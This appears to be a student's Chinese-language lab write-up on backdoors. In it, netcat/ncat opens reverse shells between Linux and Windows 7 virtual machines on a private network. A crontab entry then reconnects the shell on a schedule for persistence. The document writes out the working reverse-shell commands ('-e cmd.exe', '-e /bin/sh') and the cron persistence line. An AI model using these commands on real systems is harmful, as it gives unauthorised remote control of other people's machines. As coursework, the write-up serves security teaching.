后门原理与实践

准备工作

1. 查看Linux和Win的IP地址，ping通

• Linux地址
  Win7地址

• ping
  

2.下载ncat并安装到win7主机

---

使用netcat获取主机操作Shell，cron启动

Linux获得win7 Shell

• linux作为攻击方，win7作为靶机
• linux打开8125端口，开始监听

nc -l -p 8125

• win7反弹链接Linux

ncat.exe -e cmd.exe 192.168.72.130 8125     //-e filename:连接后执行该文件

• linux下看到win7的命令提示

Win7获得Linux Shell

• win7作为攻击方，Linux作为靶机
• win7使用ncat，监听端口5218

ncat.exe -l -p 5218  //-l:设置监听模式，-p:端口

• Linux反弹连接win7

ncat 192.168.72.116 5218 -e /bin/sh

• win7下获得一个linux shell，可运行任何指令

Cron启动

什么是crontab

cron是linux下的定时执行工具。crontab是使用cron的命令，该命令从标准输入设备读取指令，并将其存放于“crontab”文件中，以供之后读取和执行。

简单理解了一下就是写一个程序，可以规定哪年哪月哪日什么时间、或者一个周期（年、月、日、周、小时）内的具体时间执行一个命令。由于cron是每分钟运行一次，所以可以具体到分钟。指令格式如下：

crontab指令基本格式 : 

*　　*　　*　　*　　*　　command 

分　时　日　月　周　命令 

第1列表示分钟1～59 每分钟用*或者 */1表示 

第2列表示小时1～23（0表示0点） 

第3列表示日期1～31 

第4列表示月份1～12 

第5列标识号星期0～6（0表示星期天） 

第6列要运行的命令 

实验步骤

• win7下打开监听，监听端口5218

ncat.exe -l -p 5218

• linux下

crontab -e     // crontab指令增加一条定时任务，"-e"表示编辑
no crontab for root - using an empty one

Select an editor.  To change later, run 'select-editor'.
  1. /usr/bin/vim.gtk
  2. /bin/nano        <---- easiest
  3. /usr/bin/vim.basic
  4. /usr/bin/mcedit
  5. /usr/bin/vim.tiny

Choose 1-5 [2]: 3 //选择编辑器3

• （根据前文crontab格式）修改最后一行指令

55 * * * * nc 192.168.72.116 5218 -e/bin/sh
//当时是51分，设置为55分便于观察结果

• 静静等待~
• win7下获得Linux shell

---

问题与解决

• Question1

  • 开始使用ipconfig查询win7的地址是，显示是10.1.1.116，无法与Linux主机ping通
    

  • 将Win7的ip地址修改到与Linux同一网段即可

标签：Exp2,Linux,win7,crontab,5218,linux,ncat
来源： https://www.cnblogs.com/zicerain/p/10580769.html